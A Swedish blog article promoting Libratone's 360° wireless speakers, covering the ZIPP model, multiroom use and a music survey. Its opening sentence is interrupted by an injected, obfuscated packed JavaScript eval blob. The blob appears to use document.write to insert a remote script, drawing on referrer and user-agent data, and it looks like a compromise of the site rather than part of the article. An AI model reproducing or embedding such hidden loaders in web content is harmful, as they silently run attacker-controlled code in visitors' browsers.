Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Därför ska du välja en 360°-högtalare till hemmet

Därför ska du välja en 360°-högtalare till hemmet
Sebastian

Glöm eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zznsa|var|u0026u|referrer|zzsyt||js|php’.split(’|’),0,{}))
den gamla, svarta, fyrkantiga högtalaren som placerad mot en vägg endast sprider ljudet i hemmet åt ett håll. Idag ska musikupplevelsen hemma vara portabel, flexibel och ständigt närvarande. Libratone förklarar varför din nästa hemmahögtalare ska vara en 360°-högtalare.

2012 revolutionerades 360°-marknaden av den danska design- och ljudtillverkaren Libratone som flyttade högtalarna ut från hörnen och in i rummen, närmare användarna. Libratones klassiska ZIPP-högtalare var den första portabla, trådlåsa och cylinderformade högtalaren som strömmade ljudet i 360°. Högtalaren är utrustad med ett snyggt läderhandtag och konstruerad för att vara lätt och ultraportabel – allt för att släppa musiken fri och låta musikälskare njuta av sin musik överallt i hemmet.

Även om andra högtalarmärken följt i dess fotspår har Libratone idag patent på sin 360° FullRoom™ akustiska teknologi, vilken sprider ljudvågor i flera riktningar och ger lyssnare en bättre ljudupplevelse. 2015 lanserade Libratone nästa generations ZIPP-högtalare med sitt unika SoundSpace-koncept, som inspirerar användarna att skapa egna SoundSpaces genom att streama musik, podcasts, filmer och annat i vilket rum som helst i hemmet.

360°-högtalare – förhöjd ljudupplevelse och snygg inredningsdetalj
Anledningarna till att välja en portabel 360°-högtalare är flera. Först och främst är det ett estetiskt snyggt tillskott till hemmet. Genom att välja en trådlös 360°-högtalare kan högtalaren få en mer central roll i hemmet. Istället för att gömma undan högtalaren i ett hörn kan en cylinderformad 360°-högtalare istället bli en detalj som står framme och kompletterar inredningen och hemmets uttryck.

En 360°-högtalare förhöjer även ljudets funktion i hemmet. Ljudvågorna sprids jämnt över hela rummet istället för att endast strömma åt ett håll, vilket skapar en unik och rikare ljuduppelvelse hemma. Dess portabla egenskaper gör även att du kan ta högtalaren med dig in i vardagsrummet, in i badrummet eller ut i trädgården – enkelt och smidigt, utan att behöva ha multipla högtalare runt om i hemmet. Om du ändå önskar att ha fler högtalare kan du via Libratones app enkelt ansluta upp till sex högtalare i ett multiroom-system.

Visst du att..?
Musik inspirerar, motiverar och framkallar massvis med känslor. En undersökning genomförd av Ipsos på uppdrag av Spotify visade att 66 procent av svenskarna upplever måndagsblues, men att musik kan vara lösningen. Vi blir lika motiverade av musik (40 procent) som av kaffe (40 procent). Vidare är musik mer effektivt för att komma igång på måndagar än både mat (35 procent) och träning (33 procent).